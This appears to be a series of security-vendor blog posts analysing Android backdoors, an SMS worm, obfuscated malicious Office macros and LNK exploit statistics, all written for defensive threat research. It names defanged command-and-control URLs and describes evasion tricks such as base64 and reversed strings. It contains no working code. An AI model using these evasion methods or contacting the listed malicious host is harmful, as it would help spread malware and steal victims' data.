This week, our virus lab handled a case where a customer received a phishing email with an Android Backdoor archive masquerading as a Kaspersky mobile security app (we are aware that those who created this app are also disguising it as apps from other major AV brands).
It prompts recipients to install the fake Kaspersky Android app to protect their mobile security. From the context we can presume the intended targets are users in Poland.
Most email phishing attacks tend to target PC users, but this time the attackers have turned their attention to mobile platforms. We think it's a new trend in spreading virus. Mobile security is related to user privacy. In most cases, a mobile device is more important than PC for users. It contains user contacts, text messages, photos and call logs. And mobile security is generally considered to be a weak point. So, most people will believe these phishing emails and are likely to install the fake mobile security app.
In this case, the Android apk in the phishing email is a powerful and aggressive backdoor which is detected as Backdoor.AndroidOS.Zerat.a. The backdoor is full of malicious functions, but the GUI is a little simple and crude.
Maybe it only wants you to install it and click the button. By executing, it links to hxxp://winrar.nstrefa.pl/path/DeviceManager.php to register the victim device info.
Then it visits hxxp://winrar.nstrefa.pl/path/Linker.php to get commands.
According to the commands, it will perform lots of malicious activities.
Some of the commands are shown below.
Intercepting text messages:
Store and upload:
This is a new type of mobile security threat that works just like a phishing site or phishing SMS. With the phishing email, the backdoor will spread more easily. There is reason to believe that more increasingly complex mobile attacks with follow. Composite attacks on mobile platforms are simply a matter of time.
In this day and age it is very important to protect our privacy and device security. It's recommended to follow these tips:
- Download a mobile security app from the official Kaspersky website.
- Don't trust strange emails.
- Don't just open and execute files in email attachments.
On August 2, the Chinese Valentine's Day, an Android SMS worm struck China. It is called XXshenqi.apk. In the space of six hours, it infected about 500,000 devices. It has received widespread coverage in the local media. It's not just an SMS worm, containing two malicious modules: XXshenqi.apk and its asset Trogoogle.apk.
The function of XXshenqi.apk is to send SMS to spread itself and to drop another backdoor on the victim device. It is detected as Trojan.AndroidOS.Xshqi.a by Kaspersky Lab.
After installation, it sends an SMS to all the names on the victim's contact lists to get them to install the Trojan as well.
Then it probes whether or not com.android.Trogoogle.apk is present on the mobile device. If not, it displays a dialog window to prompt the user to install Trogoogle.apk.
Trogoogle.apk is a resource file in the assets folder of XXshenqi.apk.
After that, it asks the user to register the app. The Trojan will steal the user's personal ID and name and send them to those controlling the malware.
Trogoogle.apk contains more malicious functions. It is a backdoor and detected as Backdoor.AndroidOS.Trogle.a by Kaspersky Lab. It hides its icon after installation so the user is unaware of its presence. It will then respond to commands to perform malicious activity. The commands include:
It also monitors the victim's text messages and sends them to the malware owner by email or SMS.
The fact that this Trojan combintion appeared on the Chinese Valentine's Day is premeditated, taking advantage of user credulity on this special day. And it uses social engineering techniques to spread as much as possible and infect more devices. This Trojan is a good example of why it's always worth thinking twice about trusting a link received on your mobile phone. No matter who sends it, it could still be a malicious program.
After going out of fashion for a number of years, malicious macros inside Office files have recently experienced a revival. And why not, especially if they are a lot cheaper than exploits and capable of doing the same job?
Yes, that's right, cybercriminals are busily recycling this old technique, introducing new obfuscation forms to make it more effective. Let's look at two examples.Sample 1
This is an excel file with malicious embedded macros. However if you use standard Office tools to look at the macros, depending on the version, you will not see anything malicious at all or you won't be allowed to see the macros itself:
That is because the sample all strings in macros are obfuscated with a base64 encoding technique.
After de-obfuscation you can see clearly the URLs used to download the payloads:
This is a very simple technique but it is effective against simple heuristics that use string analysis of all incoming email attachments, and this is reflected in a very low VT detection https://www.virustotal.com/en/file/c916540dcab796e7c034bfd948c54d9b87665c62334d8fea8d3724d9b1e9cfc9/analysis/1403955807/
This particular sample is also interesting since in some Excel versions it is able to run macros automatically without prompting the user, enabling it. Once it has run, it drops a password-stealing Trojan directly onto the victim's system.Sample 2
This another example is a fake Aeromexico ticket.
There is no obfuscation but the URL is written from right to left, which again it might be quite useful against simple GREP analysis techniques:
It is interesting to note that the first sample was found in the wild in Venezuela, the second in Mexico and then the third in Brazil:
This one drops a ChePro banker. All three malicious samples drop only Trojans that steal financial data, but the same technique can be easily used to drop any type of malware.
So does it mean that only Latin American cybercriminals use this technique? The answer is no, not really. Our relative user's infections statistics show that actually the countries with the most attempted infections using this kind of malware are Germany and then Poland.
However, the technique is seen elsewhere, including Spain, Mexico, Brazil and others.
While analyzing malicious macro office files, you can see that the original document is created by one user and then somebody else (another criminal) assists in embedding the malicious macros.
The same technique can be easily used to drop any kind of malware in any country since this is all about social engineering and it will easily pass through email gateway security because it is basically an office document, and security email policies allow those.
You may follow me on twitter: @dimitribest
At Kaspersky Lab we regularly conduct threat studies dedicated to a particular type of cyber threat. This summer we decided to look closely at what versions of Windows Operating System are most popular among our users and also at what kind of vulnerabilities are used in cyber-attacks involving exploits. As a result we prepared a study called "Windows usage and vulnerabilities'. Some of its results were rather predictable – but some were really surprising.
The summer of 2010 saw the appearance of Stuxnet, a computer worm which, as it turned out later, had been designed specifically to sabotage the uranium enrichment process at several factories in Iran. Stuxnet was a real sensation which demonstrated what malware was capable of when precisely targeted and rigorously prepared. To proliferate, the worm used an exploit for the CVE-2010-2568 vulnerability. It is an error in processing tags in Windows OS enabling the download of the random dynamic library without the user's awareness. The vulnerability affected Windows XP, Vista, and Windows 7 as well as Windows Server 2003 and 2008.
The first malware exploiting this vulnerability was registered in July 2010. The worm Sality uses this vulnerability to distribute its own code: Sality generates vulnerable tags and distributes them through the LAN. If a user opens a folder containing one of these vulnerable tags, the malicious program immediately begins to launch. After Sality and Stuxnet this vulnerability was used by the well-known Flame and Gauss spyware.
In autumn 2010, Microsoft released a security update which patches this vulnerability. Despite this, Kaspersky Lab detection systems are still registering tens of millions of detections of CVE-2010-2568 exploits. Over the study period, more than 50 million detections on more than 19 million computers worldwide were recorded.
It's worth noting the distribution of computer operating systems on which detections of the exploit for LNK vulnerability were registered. The lion's share of detections (64.19%) registered over the last eight months involved XP and only 27.99% were on Windows 7. Kaspersky Lab products protecting Windows Server 2003 and 2008 also regularly report detection of these exploits (3.99% and 1.58% detections respectively). The large number of detections coming from XP users suggests that most of these computers either don't have an installed security solution or use a vulnerable version of Windows - or both. The detections coming from server systems prove the presence of malicious tags exploiting the CVE-2010-2568 vulnerability on network folders with open access.
The geographical distribution of all registered CVE-2010-2568 detections is also interesting.
CVE-2010-2568 detections, country distribution Nov 2013 - June 2014
Vietnam (42.45%), India (11.7%) and Algeria (5.52%) are among the leaders for the number of Kaspersky Lab detections of one of the most dangerous Windows vulnerabilities currently known. Interestingly, according our research, the outdated XP OS is also widely used in all these countries. Here are the top countries for XP use in June 2014:Vietnam 38.79% China 27.35% India 26.88% Algeria 24.25% Italy 20.31% Spain 19.26% Russian Federation 17.40% France 12.04% Germany 8.54% United States 4.52%
Top 10 countries with largest share of Windows XP users
in overall volume of users of Kaspersky Lab products.
It's not surprising that CVE-2010-2568 exploits are still popular in some of these countries. So many users of outdated versions of Windows mean these exploits are effective even though almost four years have passed since the disclosure and patching of the vulnerability.
Other findings from this research are available in the full report.